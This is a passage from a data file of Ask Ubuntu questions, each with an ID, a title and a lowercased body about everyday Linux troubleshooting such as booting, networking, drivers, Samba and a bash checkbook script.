main restricted deb-src http//old-releases.ubuntu.com/ubuntu/ karmic-updates main restricted deb http//old-releases.ubuntu.com/ubuntu/ karmic universe deb-src http//old-releases.ubuntu.com/ubuntu/ karmic universe deb http//old-releases.ubuntu.com/ubuntu/ karmic-updates universe deb-src http//old-releases.ubuntu.com/ubuntu/ karmic-updates universe deb http//old-releases.ubuntu.com/ubuntu/ karmic multiverse deb-src http//old-releases.ubuntu.com/ubuntu/ karmic multiverse deb http//old-releases.ubuntu.com/ubuntu/ karmic-updates multiverse deb-src http//old-releases.ubuntu.com/ubuntu/ karmic-updates multiverse deb http//old-releases.ubuntu.com/ubuntu karmic-security main restricted deb-src http//old-releases.ubuntu.com/ubuntu karmic-security main restricted deb http//old-releases.ubuntu.com/ubuntu karmic-security universe deb-src http//old-releases.ubuntu.com/ubuntu karmic-security universe deb http//old-releases.ubuntu.com/ubuntu karmic-security multiverse deb-src http//old-releases.ubuntu.com/ubuntu karmic-security multiverse any help would be really appreciated.. thanks .
420671	replace windows with ubuntu with iso burned onto disk ?	if i install ubuntu using the installation cd will that replace my windows 7 os entirely ?
420674	ubuntu port 80 from some hosts not reachable	i have an ubuntu-server in a lan . whenever i try to run a web-server like apache2 , or any other server like node.js on port 80 it is only reachable for some hosts in the network ( the browser is loading for a while and then it shows the browser-specific not found screen [ not an apache site not found ] ) . and it seems to change who is able to access it . here is the iptables -l output : chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination i do n't think it is a problem with apache , since as i said it does n't work with node , too . do you guys have any idea what else i could check ? this issue has been giving me headache for a while now.. let me know if you need any additional information . thanks & best , marc
420677	ubuntu server ssh - unable to reliably connect	i have a strangle problem with ssh on my web-server . for some reason , connecting to it has recently become unreliable . sometimes i can connect , other times i have to try 3-8 times before it will accept the connection ( each time ending in a timeout ) . when i debug the connection , i can see that it is hanging at `` connecting to the server '' . other services ( apache , virtualmin ) remain running fine . the first thing i did was turn dns off on my client to see if that was slowing down the connection . my next though was that openssh may be disallowing connections temporarily from too many failed login attempts , so i disabled password auth for ssh . ( i use keys . ) unfortunately that did n't help either . because it hangs at connecting to the server , i cant see anything helpful in my auth.log . i have this problem connecting from cygwin , gnome terminal , and osx on different networks . relevant logs : netstat : root @ server : netstat -nat |grep 22 tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen tcp 0 48 x.x.x.x:22 x.x.x.x:48734 established tcp 0 0 x.x.x.x:49223 x.x.x.x:53195 established tcp6 0 0 : ::22 : : : * listen iptables root @ server : iptables -l -nv chain input ( policy accept 7653 packets , 3915k bytes ) pkts bytes target prot opt in out source destination chain forward ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain output ( policy accept 5626 packets , 9728k bytes ) pkts bytes target prot opt in out source destination any ideas ?
420680	i just installed the gmt package from synaptic , but none of the command can be found	i just downloaded the package gmt from synaptic however i can not use any of the commands . for example , i got the package primarily for the 'minmax ' command and when i type minmax file.txt i get minmax : command not found i do get the man page for minmax , however . have i missed something during the installation ?
420682	ubuntu on thinkpad x1 carbon with high dpi display	i have a thinkpad x1 carbon on order and i want to install ubuntu 13.10 . is there a step by step guide to make this work with uefi ? i 've read that i have to change the bios , and i 've also read that changing the bios is unnecessary . there is a lot of conflicting information out there . where is the definitive resource ? also , does anyone have any experience getting ubuntu to run properly on high dpi displays ? is there a terminal command that will scale everything so it is n't tiny on a 2560x1440 display ?
420683	error trash dolphin	anybody khows how to correct this error in kubuntu 13.10 ... . ? when i tried to erase a file a got the next message -- > `` a older item named 'trash : / ' alredy exists '' ... this problem i only got it with dolphin whith nautilus i did n't get it
420686	can i set process scheduling of ubuntu 12.04 lts to sjf ?	i need to change the process scheduling of ubuntu to sjf as a part of my research project . can i do it through c/c++ code ? please give me the code for that if it is possible .
420687	symbol 'grub_isprint ' not found , error on boot , can not use computer	i am installing ubuntu 13.10 and the installer froze while logging in to ubuntu one so i restarted and got `` error : file '/grub/i386-pc/normal.mod ' not found '' so i booted up the live usb and ran `` sudo grub-install /dev/sda -- root-directory=/mnt '' and then when i restarted i got this error `` symbol 'grub_isprint ' not found ''
420689	trying to compile binaries with static flag ?	hello everyone i am working over gem 5 simulator on ubuntu os and i need to compile any program with static flag for this i am using this command ( [ /work/gem5 ] alpha-linux-gnueabi-gcc –dunix –o queens queens.c –static ) where queens.c is my c file but i am unable to do that because every time it is showing as command not found , i have also tried to install it through sudo apt-get but it is not working . kindly help . !
420694	how to make lightdm use tty6 instead of tty1 ?	i am using ubuntu desktop 13.10 amd64 for imac . when the system boots up , lightdm loads gnome and hence occupies the first virtual terminal ( tty1 ) . this is the default behavior after installation . the problem is , i like to use tty1 and hence i want to make lightdm uses tty6 instead of tty1 , so that tty1 is unoccupied . how to do this .. ?
420697	is ubuntu server 13.10 suitable for running a web server on older hardware ?	will a old computer with 1024m of ram and a pentium 4 cpu be able to host a personal website , while still allowing me to use the web browser ? does someone have any recommendations for helping it run more responsively ?
420698	setting up a basic firewall for 1st time user	could anyone tell me some basic commands to set up my firewall . i already have ufw . what commands should i use for a basic security ?
420699	wireless : asus pce-ac68 on 13.10	i purchased a http : //www.asus.com/networking/pceac68/ a few months back to use on my plex/backup/minecraft server , with the intention of also possibly using the server as a router . i have n't had enough energy or patience to try messing with using it as a hotspot yet , because i have n't been able to get it to connect to my existing router to download updates and software . it is seeing the available networks in my apartment just fine , but will not connect to my ssid . the related bit of lspci : 03:00.0 network controller : broadcom corporation bcm4360 802.11ac wireless network adapter ( rev 03 ) sudo dpkg -s bcmwl-kernel-source | grep version version : 6.30.223.141+bdcom-0ubuntu1 my belkin usb adapter works just fine . ( that 's actually how i 'm posting this )
420700	i royally messed up my audio situation in xubuntu 13.10	so i was watching a video and was getting a buzzing noise so i opened up alsa-mixer to messa around with it . after that i installed gnome-alsamixer because i wanted a gui interface for it . well while messing with that my audio cut out . after a restart the audio icon in my system tray disappeared . i 've tried re installing alsa and pulse audio as well as trying to install the realtek drivers from their site . when i try and open pulseaudio volume control the volume control says that it failed to connect to pulseaudio . when i try and force-reload alsa it says that there is no driver module to reload . i 'm at a loss after two hours of scouring forums and any advice would be greatly appreciated .
420706	how to fix blank pages on spotify ?	sometimes spotify show blanks pages and not load anything
420713	terminal default workspace when using keyboard shortcut	i was happily working with my terminal when i accidentally moved it to another workspace by using ctrl + shift + alt + arrow . as i 've noticed my mistake , i moved the window again to the initial workspace ( top left ) , but now it opens in the wrong workspace ( bottom left ) whenever i launch it . i have used compizconfig settings manager to make it open in the first workspace via place windows section . the result is that it is opening in the right workspace ( top left ) when i use the launcher , but when i use the terminal keyboard shortcut ctrl + alt + t it 's still opening in the bottom left workspace . how can i fix this ? i am using ubuntu 12.04 edit actually , it still opens in the wrong workspace with both methods . i do n't know how it opened in the right one a few times since i did n't change anything .
420718	how to get dockbarx previews in xfce panel without compiz	a lot of questions have been covered here about getting dockbarx previews working in xfce with compiz but i 'd like to get previews working using the xfwm standard compositing to keep things lightweight . xfce
420720	can not access network share of windows 7 from ubuntu	i have a problem in ubuntu 12.04 my lan settings are as follows : 4 windows pc . 1 ubuntu 12.04 desktop . i can see all the network pc on my ubuntu network . i can access shared folders of 3 windows pc but can not access folders of 1 windows pc . can anybody tell me what should be the problem ? ?
420722	how to compile a c program that uses pthread.h ?	i 'm a beginner and i 'm new to ubuntu . i just installed it and want to run a c program . i have no idea what platform to use or where to write the code . i need to use pthread.h header file in the program . can anyone help me ?
420726	hardisk driver is not found ?	i 'm currently using ubuntu 13.10 . i am trying to make my laptop dual boot with win 8 , but in the win 8 set up , the driver of my harddisk is not found . i 've tried to download the driver from the acer website , because i 'm using an acer aspire 4736z , but it did n't work . i open it with wine and these words comes up : this computer does not meet the minimum requirements for installing the software .
420728	resize my root partition	i have the following partitions shown in gparted . it is not showing the partition in which ubuntu is installed as root . how can i resize my root partition by shrinking the 440gb partition to 400gb and increasing the my root partition is full so i cant install my applications . i want a very easy guide to do this . thanks in advance .
420734	problem loading and intel pro/1000 nic in ubuntu	i 'm trying to get an intel pro/1000 mt server nic working in my ubuntu desktop 13.10 . with no extra configuration , the system saw the interface correctly as an intel 82545 chip and loaded the e1000 driver for it . but in the dmesg logs there are some errors for not being able to get the hardware mac , this prevents this interface from working at all . the system 's main board is an asus z87 , and although this card uses a 64-bit pci-e interface , it 's mounted on a 32bit slot ( it 's a supported configuration as intel says ) . this works in windows properly , i checked it , so there must be a driver issue , not hardware . any suggestion on what 's the problem and how to solve it ? let me add , i tried to compile the latest e1000 and e1000e kernel modules built from source , but still have the same problem . ( of course the kernel for the ubuntu 13.10 , kernel linux_3.11.0-15 , has the the e1000 driver built in , not as a loadable kernel module . is it going to work at all if i rmmod e1000 and insmod /the/new/compiled/e1000.ko ?
420735	could not init font path element /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype , removing from list !	i am trying to install xvfb on my ubuntu server ( without desktop ) in order to run a selenium test case . i followed this tutorial but while running the below code it showed me error like : root @ test-app-java-lo-node01 : /etc/apt # xvfb :99 -ac [ dix ] could not init font path element /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype , removing from list !
420736	bash script download dynamic directories	how to download the most recent packages in deb files ( all in a folder ) for my platform ( x86_64/i386 ) & distro with bash script ? there is no ppa for this apps . so i 'm interesting in automatization ( downloading the most recent deb packages for my platform/distributive ) of the process of downloading deb files , not manual downloading . offline manual download not the case , here but if some files are present locally we can skip to download them . i 'm not interesting in downloading deb files from other computer . so files to be downloaded should much next pattern : { http|ftp } : //updates.etersoft.ru/pub/etersoft/ [ the most recent version available for my platform and distributive ] /last [ /x84_64 if needed ] /ubuntu/ [ my distributive ] /*.deb here are some examples of urls to download : ftp : //updates.etersoft.ru/pub/etersoft/postgres @ etersoft/9.2.1/x86_64/ubuntu/12.04/libpq5.5-9.2eter_9.2.1-eter1ubuntu_amd64.deb ftp : //updates.etersoft.ru/pub/etersoft/postgres @ etersoft/9.2.1/ubuntu/12.04/libpq5.5-9.2eter_9.2.1-eter1ubuntu_i386.deb http : //updates.etersoft.ru/pub/etersoft/wine @ etersoft/2.1.3/hasp /x86_64/ubuntu/12.04/haspd_3.3-eter5ubuntu_amd64.deb http : //updates.etersoft.ru/pub/etersoft/wine @ etersoft/2.1.3/hasp/ubuntu/12.04/haspd_3.3-eter5ubuntu_i386.deb my current disributive is ubuntu x86_64 12.04.04 lts thanks .
420739	hdmi to tv keeps dimming in and out ?	i connected my asus zenbook running ubuntu 13 to my tv ( panasonic ) via hdmi . my main problem is that when i 'm watching a movie the screen keeps dimming in and out . it does n't dim all the way out , just becomes darker for a few seconds and then gradually brightens back to normal , then after a few minutes dims again and so on . tried using different video players like vlc , dragon , and the built in video player , but to no avail . and have not been able to find any useful threads on the subject . please help.. my girlfriend might leave me or decline to come over if we have to keep watching movies only on the laptop . i 'll be happy to post any additional info needed to solve this .
420744	operation not permitted when logged in using admini	i installed ubuntu 13.10 .i logged in with administrator account.when i right click on tar file and click on extract here.its giving me error.operation not permitted.can any one please tell what 's the problem .
420746	how can i make the menu bars adhere to the ambiance theme ?	xubuntu 13.10 i chose ambiance as a theme and it does n't seem to work for all elements of the gui/de : i 'd like to make the de/gui look coherent and `` light '' , just as the rest of the ambiance theme . how could i do that ? edit i am not talking about radiance , its light counterpart .
420747	error while trying to boot from usb stick on os x	i have downloaded ubuntu and created a bootable usb , but when i try to boot from the usb i simply get a black screen with the message `` error loading operating system '' . i can not figure out how to solve this . i can provide more information if necessary , thanks ahead of time .
420748	13.10 sees external ntfs drive as empty space	i have an existing install of both ubuntu 13.10 on my laptop , and lubuntu 13.10 on my old p4 . neither of them can see the ntfs partition on my external 2tb hard drive , which is odd . the lubuntu machine has another identical ( also 2tb , purchased at the same time ) , also ntfs formatted and partitioned in the same way - that mounts just fine . windows 7 on a third pc sees the drive and partition just fine , and chkdsk returned no errors . there is 102mb of free space on the drive ( so , not very much ) and it only has a single partition as large as possible . it 's using a guid partition table . image grab shows ntfs utility ca n't see drive ; disks utility can see it but the partition is empty , and outputs of cat /etc/fstab and cat /proc/mounts , if it is any help . i do have the ntfs configuration tools installed , and i have done sudo mkdir -p /etc/hal/fdi/policy ( because i had to in order to get the first ntfs drive to work , which you can see in the screenshot ) . i 've also clicked a lot of related links here on askbuntu and googled , but nothing has been mentioned so far that worked for me . happy to be advised .
420749	decrypt truecrypt containers using dm-crypt	is it possible to decrypt truecrypt containers using dm-crypt ? i have some container files created with truecrypt and i just wanted to know if it 's possible to decrypt them using dm-crypt so i can stop using truecrypt and use something more opensource like dm-crypt .
420750	samba + vpn + windows client is very slow	there is something to care about when i use samba in ubuntu from a windows xp client ? the speed is very slow . i tried to do the same test from a windows 7 and there was no problems . the test i tried , is just open an excel file . from a windows 7 , it takes 2~5sec but from a windows xp ( service pack 2 ) it takes 1min . i 'm getting this error in the log of that client : [ 2014/02/13 18:01:48.734267 , 0 ] smbd/server.c:1107 ( main ) standard input is not a socket , assuming -d option i do n't know if i have to try other configuration in the server . now i 'm using this configuration : [ global ] unix extensions = no kernel oplocks = no nt acl support = no strict locking = no [ share ] path= '' [ ... ] '' writable = yes read only = no create mode = 0777 valid users = +smbusers inherit permissions = yes force group = smbusers force create mode = 0777 force directory mode = 0777
420752	wifi hostspot , not obtaining i.p	i have successfully created a hotspot on my ubuntu machine but my android phone is not obtaining the ip while connecting . i made the hotspot by adding this repo : ppa : nilarimogard/webupd8 further installed ap-hotspot . it was working for me for past two weeks but now it has stopped working . i have tried reinstalling and reconfiguring the ap-hotspot but all in vain . please help me out !
420753	after last update , my varnish and all services broke !	i have an ubuntu 12.04 lts server hosted in a xen vps . strictly being used in terminal mode via putty . uname -a linux webserver 3.2.0-58-generic # 88-ubuntu smp tue dec 3 17:37:58 utc 2013 x86_64 x86_64 x86_64 gnu/linux it works like a charm since 8 months and i have regularly updated it without big hassles so far . i logged on yesterday and found out it prompted for a number of updates . one of them mentioned `` change in how services start up blah blah '' . i applied them and rebooted . i always reboot to be sure every patch leads to a bootable system . they system booted too fast and running htop revealed a memory usage of just 75m ( ! ) instead of the usual 800m . i started my routine checks and quickly found out varnish was missing its shared library . it just got removed and yes i tried the ( sudo ) ldconfig stuff . i easily fixed this by reinstalling : sudo apt-get install libvarnish-dev omitting the sudo portion for those who are logged on as root of course . but the second bit , i do n't know how to fix it . not a single daemon or service has started . no error message , nothing . stuff can still be manually started by command line but of course it 's a ton of services each with its own configuration etc . my mind goes immediately to the release note telling the services startup has been changed . sure it looked mostly cosmetic to me ( adding a [ ... ... ] visual feedback with success or failure notification ) but i see it is not just cosmetic . for now i have resolved by restoring the backup i have made prior to patching but that 's not a viable long term solution . what can i do to upgrade my system and also make my services all boot with the new boot procedures ? i mean , is there a `` painless and transparent '' upgrade path ? after reverting to the backup , i can show the list of packages i am prompted to update . if i update them , my box completely breaks in the services startup and have to restore again ( i tried already twice ) . root @ webserver : ~ # apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : dmsetup libdevmapper1.02.1 lsb-release udev the following packages will be upgraded : init-system-helpers initscripts insserv kmod libaprutil1 libkmod2 libselinux1 lsb-base module-init-tools sysv-rc sysvinit-utils 11 upgraded , 0 newly installed , 0 to remove and 4 not upgraded . notice how until this upgrade i did not even have `` kept back '' packages .
420755	do n't get first menu where you choose between operating systems	i have just finished installing ubuntu again . this is not the first time i have done this , but i had to restart from a computer that only had windows on it . and i wanted to install it alongside windows . i did it overnight , so i can not be sure if there were any errors i might have missed . i left my computer just having entered the correct country , language , keyset , ... and when i returned i got the 'need to restart ' message . while restarting the compter made me remove the dvd . everything seemed fine till this point . once i start it , i do n't get the usual purple menu where you can choose between operating systems , but windows starts immediatly . yet if i look at the amount of space on my hard drive , it seems like the partition was succesfull . what should i do ? try to reinstall it and using advanced optoins while creating the partition ? i 've never done this . are there easier ways ? thank you for your help , sincerely maryna bardadym
420758	cpu load is 100 % non-stop after installing 500 new fonts	since i installed 500 new fonts and cleaned data with bleachbit , my cpu loading is 100 % non-stop every time i turn on my laptop or restart it . after waiting few time in power off , i switched it on and it runs normally . what 's the problem ?
420759	ubuntu 12.04 on vmplayer no sound	i check my upper-left sound ( it doesnt mute ) and sound setting output : play sound through only have analog output ( es1371 audiopci-97 ) and dont have speaker ? and use alsamixer to check the volumn master pcm line cd mic mic boos video phone s/pdif aux have already set value , but still havent have speaker ... how can i solve this question ? thank you~
420760	math operations from array elements in bash script	using ubuntu 13.10 , bash and zenity , i am building a simple checkbook utility . in the code below , the section with all the commented math commands are the ones that i have tried . there is also a problem with the part of the value to the right of the decimal point as evidenced by the following error message : /home/larry/bin/chkbk : line 144 : let : tmp [ 7 ] =163.41-40.00+0 : syntax error : invalid arithmetic operator ( error token is `` .41-40.00+0 '' ) i would appreciate any help . thanks ... . # ! /bin/bash # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # check book utility # # -- using chkbk as program # # -- using chkdat as data file # # -- using chkhlp as help file # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # declarations # # # # # # # # # # # # # # # # # # # declare -a chk= ( ) declare -a hlp= ( ) declare -a tmp= ( ) declare -r patdat= '' /home/larry/bin/chkdat '' declare -r pathlp= '' /home/larry/bin/chkhlp '' # end declarations # # # # # # # # # # # # # # # # functions # # # # # # # # # # # # # # # # loadfiles ( ) { zenity -- progress\ -- title=initializing ... .\ -- no-cancel\ -- text='loading ... .'\ -- pulsate\ -- auto-close\ -- width=250\ -- height=50\ -- timeout=3 if [ -e ~/bin/chkdat ] ; then let i=1 while ifs= $ '\n ' read -r line_data ; do chk [ i ] = '' $ { line_data } '' ( ( ++i ) ) done < ~/bin/chkdat ; else > ~/bin/addrdata ; fi if [ -e ~/bin/chkhlp ] ; then let i=1 while ifs= $ '\n ' read -r line_data ; do hlp [ i ] = '' $ { line_data } '' ( ( ++i ) ) done < ~/bin/chkhlp ; else > ~/bin/chkhlp ; fi } # end loadfiles function main ( ) { ans= $ ( zenity -- list\ -- radiolist\ -- text `` select : '' \ -- width 300\ -- height 250\ -- title `` main menu '' \ -- column `` choice '' \ -- column `` action '' \ false `` add new transaction '' \ false `` edit transaction '' \ false `` search transactions '' \ false `` view help '' \ true `` exit program '' \ -- hide-header ) # this must be at the bottom case $ ans in `` add new transaction '' ) d= $ ( zenity -- calendar\ -- title `` add transaction `` \ -- text `` click ok for today 's date '' \ -- date-format= ' % d % b % y ' ) tmp [ 1 ] = $ { d } a= $ ( zenity -- list -- radiolist\ -- title `` add transaction '' \ -- text `` account codes '' \ -- column `` choice '' \ -- column `` action '' \ -- width 300\ -- height 500\ false `` 000 null account '' \ true `` 101 ssi '' \ false `` 102 ssa '' \ false `` 103 gifts '' \ false `` 104 other '' \ false `` 201 rent '' \ false `` 202 electric '' \ false `` 203 general '' \ false `` 204 food '' \ false `` 205 clothing '' \ false `` 206 pet care '' \ false `` 207 charity '' \ false `` 208 health care '' \ false `` 209 transportation '' \ -- hide-header ) tmp [ 2 ] = $ { a:0:3 } m= $ ( zenity -- list -- radiolist\ -- title `` add transaction '' \ -- text `` method codes '' \ -- column `` choice '' \ -- column `` action '' \ -- width 300\ -- height 250\ true `` bb beginning balance '' \ false `` ck check '' \ false `` cs cash '' \ false `` dc debit card '' \ false `` dd direct deposit '' \ -- hide-header ) tmp [ 3 ] = $ { m:0:2 } v= $ ( zenity -- entry\ -- title `` add transaction '' \ -- text `` enter payee / payor '' \ -- width 400 ) tmp [ 4 ] = $ { v } t= $ ( zenity -- entry\ -- title `` add transaction '' \ -- text `` enter amount of transaction : '' ) if [ $ { a:0:3 } -lt 200 ] ; then tmp [ 5 ] =0 tmp [ 6 ] = $ { t } ; else tmp [ 5 ] = $ { t } tmp [ 6 ] =0 ; fi if [ $ { a:0:1 } -eq 0 ] ; then tmp [ 7 ] = $ { tmp [ 6 ] } else # [ $ { a:0:1 } -gt 0 ] ; then # echo `` tmp [ 7 ] = chk [ 7 ] - tmp [ 5 ] + tmp [ 6 ] '' # tmp [ 7 ] =`expr $ { chk [ 7 ] } - $ { tmp [ 5 ] } + $ { tmp [ 6 ] } ` # $ ( ( tmp [ 7 ] = $ { chk [ 7 ] } - $ { tmp [ 5 ] } + $ { tmp [ 6 ] } ) ) let x= $ { # chk [ @ ] } -1 # $ ( ( tmp [ 7 ] = chk [ x ] - tmp [ 5 ] + tmp [ 6 ] ) ) # let tmp [ 7 ] = '' $ { chk [ x ] } '' # let tmp [ 7 ] = '' $ { tmp [ 7 ] } '' - '' $ { tmp [ 5 ] } '' # let tmp [ 7 ] = '' $ { tmp [ 7 ] } '' + '' $ { tmp [ 6 ] } '' # let tmp [ 7 ] = chk [ 7 ] - tmp [ 5 ] + tmp [ 6 ] # tmp [ 7 ] = $ { chk [ x ] } - $ { tmp [ 5 ] } + $ { tmp [ 6 ] } # tmp [ 7 ] =chk [ x ] -tmp [ 5 ] +tmp [ 6 ] let tmp [ 7 ] =chk [ x ] -tmp [ 5 ] +tmp [ 6 ] fi ; zenity -- question\ -- title= '' add transaction '' \n\ -- text= '' you have entered : \n\ date : $ { d } \n\ account : $ { a } \n\ method : $ { m } \n\ vendor : $ { v } \n\ amounmt : $ { t } \n\n\ are these entries correct ? '' case $ ? in 0 ) for i in $ ( seq 1 7 ) ; do chk= ( `` $ { chk [ @ ] } '' `` $ { tmp [ i ] } '' ) echo `` $ { tmp [ i ] } '' > > ~/bin/chkdat done main ; ; 1 ) main ; ; esac ; ; `` edit transaction '' ) let x= $ { # chk [ @ ] } ret= $ ( for i in $ ( seq 0 $ x ) do echo $ { chk [ i ] } done | yad -- list\ -- title `` checkbook '' \ -- text `` edit check records : '' \ -- column date\ -- column account\ -- column method\ -- column 'pay to/from'\ -- column debit\ -- column credit\ -- column balance\ -- width 800\ -- height 450\ -- center\ -- editable ) main ; ; `` search transactions '' ) let x= $ { # chk [ @ ] } ret= $ ( for i in $ ( seq 0 $ x ) do echo $ { chk [ i ] } done | yad -- list\ -- title `` checkbook '' \ -- text `` view check records : '' \ -- column date\ -- column account\ -- column method\ -- column 'pay to/from'\ -- column debit\ -- column credit\ -- column balance\ -- width 800\ -- height 450\ -- center ) main ; ; `` view help '' ) zenity -- text-info\ -- title `` checkbook help '' \ -- filename=/home/larry/bin/chkhlp\ -- width=450\ -- height=450 ; main ; ; `` exit program '' ) ; ; esac } # end main function # end functions # # # # # # # # # # # # # # # # # # # main program # # # # # # # # # # # # # # # # # # # echo -en `` \e ] 0 ; check book \007 '' echo -en `` \e [ 0 ; 46m '' ; clear yad -- text-info\ -- timeout=5\ -- borders=0\ -- width=300\ -- height=50\ -- center\ -- no-buttons\ -- fixed\ -- title=welcome\ -- text= '' larry\ 's checkbook\n\n version 1.0.0\n\n 2014 avdiel data solutions '' \ -- text-align=center loadfiles main echo -en `` \e ] 0 ; larry 's bash \007 '' reset # end of program
420761	postfix+dovecot unix user authentication	i want to set up a mailserver with postfix+dovecot+roundcubemail . and i do n't want virtual users . is it possible to use unix users and somehow just include the /etc/passwd file for authentication/login ? the background is that i have several services installed on my server and all of them use unix user authentication . for example , owncloud . so i want all of the users to be able to access all services with one login . i know this could be solved by ldap but i am not smart enough to set up ldap . ; )
420762	wired connection does n't work on startup , it works on suspend with suspend_modules however	i installed ubuntu and realised the only internet connection that was working was the wifi one , but i need to have a wired one working where i live ( which is in university halls ) because we 're not allowed to set up our own router devices . ( only told you this so that i do n't receive answers like `` just get a router and move on '' ) basically , what i managed to do was enable wired connections on waking up from suspend , by adding : suspend_modules= '' $ suspend_modules r8169 '' in /etc/pm/config.d/unload_modules it 's become a bit frustrating to suspend the laptop right after i turn it on ( if it 's been completely turned off ) only to enable wired connections , though ... so , is there any module i should add to config.d in order to enable wired connections on startup as well ? or do you have any other solutions for this ? cheers : )
420763	how to recover a normal desktop in linux	i have a ubuntu 13.10 . it worked normally until i somehow mistakenly turn it into terminal mode . i was trying to install some nox to my virtual box , and i downloaded a vm image package and imported into my virtual box . suddenly everything froze . even keyboard was not responding . so i had to restart my computer and it turned into pure terminal mode . i doubt if there 's anything in my downloaded package that somehow changed my kernel or like . anyway after some struggle , i can go back to the desktop via startx command , but the desktop is different from what i had before . there 's no launch panel , no window , and even if you open libreoffice , you can not minimize or move the `` window '' ( if there 's one ) it belongs to . the program is fine , i can type in the libreoffice , i can write words in it , but i can not deal with windows . so i guess it went into some kind of window manager free mode like the old eighties . please brief me what term is appropriate to refer to this situation . i do n't even know what to google .
420766	forward private ip to public ip	i have 2 machines machine a have two interfaces and webserver eth0 is private ip 192.168.1.1 eth1 is public ip 1.2.3.4 machine b eth0 is private ip 192.168.1.2 running tomcat ( 8080 ) now how can i access 192.168.1.2:8080 using my public ip any idea how to port forward this ? thank you guys for your answers . i know how to use reverse proxy since my public ip contain a django application which run on port 8000 . but my question is , is it possible to act my machine a as router of machine b. that will accept connection on port 8080 .
420767	dual boot w7 with 12.04 with gpt table and uefi	i have a lenovo z570 with 4gb ram and 700gb hdd with w7 x64 . i want to dual boot ubuntu alongside w7 but during installation , there is no install ubuntu alongside w7 option . i have tried all the methods shown in this forum and none seem to work for me . can anyone please help me out with a step by step instruction ? i 'm new to ubuntu and any help is appreciated thanks
420772	what is the code to disable `` open file '' under menu tab in firefox userchrome.css ?	i want to disable the open file option in the menu tab in firefox . i have written menuitem [ label=open file ] { display : none ; } but it 's not working .
420774	what is the difference between ubuntu kylin and ubuntu with default language chinese ?	after going through the home page of ubuntu kylin , i rather find no considerable difference between ubuntu kylin and ubuntu with chinese language set as default . there are of course some special chinese apps ( chinese lunar calendar , for example ) .but ca n't these apps be installed on ubuntu as well ? so if i get an ubuntu , customise it to have all the same apps as kylin , and set chinese as default language , what will be the difference between both ? what was the need of kylin , when ubuntu is itself so customizable ? there is no bad in bringing an custom ubuntu for chinese people.but there seems to be no reason for making it official.if we look at other official distros like lubuntu or xubuntu , they have a significant difference than ubuntu.this is not the case with kylin.it would only take , say 15 minutes to convert ubuntu into ubuntu kylin .
420777	if i need to create a ubuntu vm which version is better to make	i need to know i have vmware 9 and created a rhel6.4 vm using in my windows7 host os , if i need to create a ubuntu vm which version is better to make and system requirements ?
420778	i need step by step guidence to recover grub	yesterday i removed some two tiny partions from the disk , today it wo n't boot . i opened my computer from usb now , but i can not install grub from chroot . i run sudo blkid i noticed that my ubuntu installed partition moved from sda6 to sda5 . first i run sudo mount /dev/sda5 /mnt then sudo grub-install -- root-directory=/mnt /dev/sda5 but i get following error . /usr/sbin/grub-bios-setup : warning : file system `ext2 ' does n't support embedding . /usr/sbin/grub-bios-setup : warning : embedding is not possible . grub can only be installed in this setup by using blocklists . however , blocklists are unreliable and their use is discouraged.. /usr/sbin/grub-bios-setup : error : will not proceed with blocklists . would you please tell me what to do now ?
420779	how to set default viewport on compiz desktop wall ?	i have 9 viewports , 3x3 in compiz desktop wall . every time i boot up it starts with viewport 1 , in the left top corner . i 'd like it to start with viewport 5 , in the center . how can i set that ? thanks in advance !
420781	black screen areas with gnome classic	i 've ( re ) installed ubuntu 12.04 on my eeepc-1000h . i 've installed gnome classic . everything was going vell , but now , with screen resolution 1024x600 , i 've got in each side of the desktop , a black area ( +-20px width ) : the mouse pointer goes there , but mouse clicks do n't work ; windows maximized do n't use those areas . the panels seem not affected by this : they fit along all the screen . how can i remove those black areas ? can anyone help ?
420783	touchpad sensitivity on buttons problems	i have an asus notebook touchpad that has sensitivity also on bottom left and right buttons and this is causing me problems . fist if i keep a finger on a button , the other finger moving on the touchpad is not revealed and the cursor does n't move , notice that when i boot on windows keeping a finger on a button is not a problem and the cursor moves . second when i click on buttons the cursor moves slightly from the position before clicking . i 'm here to ask if it is possible to disable the sensitivity on buttons somehow and if not at lease let the touchpad work also if one finger stays still on one of the sensible buttons ( like windows does ) .
420784	what for ` -- disabled-login` and ` -- gecos` parameters from inside of `adduser` command stands for ?	running ubuntu 12.04 , i setup a private git server and created a group called git some time ago . now i am following a guide to install gitlab and when it came to adding a user to the git group and create it , i saw that i already had it . the command is this : sudo adduser -- disabled-login -- gecos 'gitlab ' git taken from gitlab installation tutorial . i would like to understand that command correctly . for me i thought i add a user to a group like this : adduser user group so what for -- disabled-login and -- gecos stands for ?
420788	how to set a temporary custom desktop width for a broken display	i need to temporarily limit the horizontal extension of the ubuntu environment , because the display is broken and its rightmost quarter is full of vertical lines , making the top panel menus not visible . the screen resolution is 1440x900 , so i want the whole graphic environment extend from the left side to only 1000 pixel at the right of it . is it possible and how ? thank you .
420790	vmware/virtualbox hangs ubuntu while installing windows 7	i am trying to install windows 7 in vmwareplayer or virtualbox on ubuntu 12.04lts and every time i have tried it the result is that ubuntu hangs and only hard reset works . i tried both vmware and virtualbox softwares and different windows 7 iso images . my ubuntu never hangs - never . only with this virtualization stuff ... what could it be ? cheers , marteau
420792	aticonfig still shows old config after replacing video card	i had a system with amd 7950 video card installed , than i upgraded the video card to r9 280x and reinstalled the driver to the latest version amd catalystâ˘ 14.1 beta driver i did this for reinstall the card config : sudo aticonfig -- initial -f -- adapter=all but now i still get the old version : aticonfig -- odgt -- adapter=all adapter 0 - amd radeon hd 7900 series sensor 0 : temperature - 29.00 c
420800	ubuntu 12.04 on hp 20-2000ez	my problem is that i ca n't install ubuntu . i 've disabled the security boot etc . i see the logo of ubuntu , the points of loading and than the screen go all in black . what can i do to fix this ?
420803	login screen makes me login 4 times	using ubuntu 12.04 , after coming back from suspend mode , i find that i consistently ca n't login on first try . it usually makes me have to go through it twice , but then it became 3 times , and now it 's 4 . i 'm gettin ' real sick of sitting here typing in my password 4 times before i can get back into my desktop . is there any known bug that could be causing this ?
